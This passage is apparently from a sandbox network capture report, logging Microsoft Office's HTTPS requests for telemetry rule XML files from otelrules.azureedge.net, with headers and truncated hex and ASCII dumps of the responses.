                                                                                                                                                                                          2024-11-23 16:45:13 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          117192.168.2.54988413.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:13 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:13 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:13 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1360
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                                          ETag: "0x8DC582BDD74D2EC"
                                                                                                                                                                                          x-ms-request-id: f6495d06-a01e-0021-3357-3c814c000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164513Z-178bfbc474bscnbchC1NYCe7eg00000004sg00000000kv3w
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:13 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          118192.168.2.54988613.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:13 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:13 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:13 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1390
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                          ETag: "0x8DC582BE3002601"
                                                                                                                                                                                          x-ms-request-id: 3cbcbade-201e-0000-6443-3ca537000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164513Z-178bfbc474btrnf9hC1NYCb80g00000004u000000000gcw9
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:13 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          119192.168.2.54988713.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:13 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:13 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1401
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                                          ETag: "0x8DC582BE2A9D541"
                                                                                                                                                                                          x-ms-request-id: 3385e8da-101e-00a2-400c-3d9f2e000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164513Z-178bfbc474bfw4gbhC1NYCunf400000004q000000000e5wx
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:14 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          120192.168.2.54988813.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:13 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:14 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1364
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                          ETag: "0x8DC582BEB6AD293"
                                                                                                                                                                                          x-ms-request-id: 38badaf1-c01e-00ad-2128-3da2b9000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164514Z-178bfbc474b7cbwqhC1NYC8z4n00000004r0000000003pg1
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:14 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          121192.168.2.54989013.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:15 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:16 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1354
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                          ETag: "0x8DC582BE0662D7C"
                                                                                                                                                                                          x-ms-request-id: 119e228c-001e-0046-1663-3bda4b000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164515Z-178bfbc474btrnf9hC1NYCb80g00000004w000000000b7pq
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:16 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          122192.168.2.54988913.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:15 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:16 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1391
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                          ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                                                          x-ms-request-id: c0af4880-401e-00ac-328c-3a0a97000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164516Z-174c587ffdf8fcgwhC1TEBnn7000000003eg000000000kfr
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:16 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          123192.168.2.54989113.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:15 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:16 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1403
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                          ETag: "0x8DC582BDCDD6400"
                                                                                                                                                                                          x-ms-request-id: e8f84e55-c01e-0079-2269-3be51a000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164516Z-178bfbc474bbcwv4hC1NYCypys00000004f000000000kbwu
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:16 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          124192.168.2.54989213.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:16 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:16 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1366
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                                          ETag: "0x8DC582BDF1E2608"
                                                                                                                                                                                          x-ms-request-id: 652d7de6-201e-0033-5d3c-3cb167000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164516Z-15b8b599d88pxmdghC1TEBux9c00000003bg0000000077e9
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:16 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          125192.168.2.54989313.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:16 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                          2024-11-23 16:45:16 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sat, 23 Nov 2024 16:45:16 GMT
                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                          Content-Length: 1399
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                                                                          ETag: "0x8DC582BE8C605FF"
                                                                                                                                                                                          x-ms-request-id: 2df0f233-b01e-0084-4f11-3dd736000000
                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                          x-azure-ref: 20241123T164516Z-178bfbc474b9fdhphC1NYCac0n00000004n000000000cd1r
                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-11-23 16:45:16 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                          126192.168.2.54989513.107.246.63443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-11-23 16:45:18 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
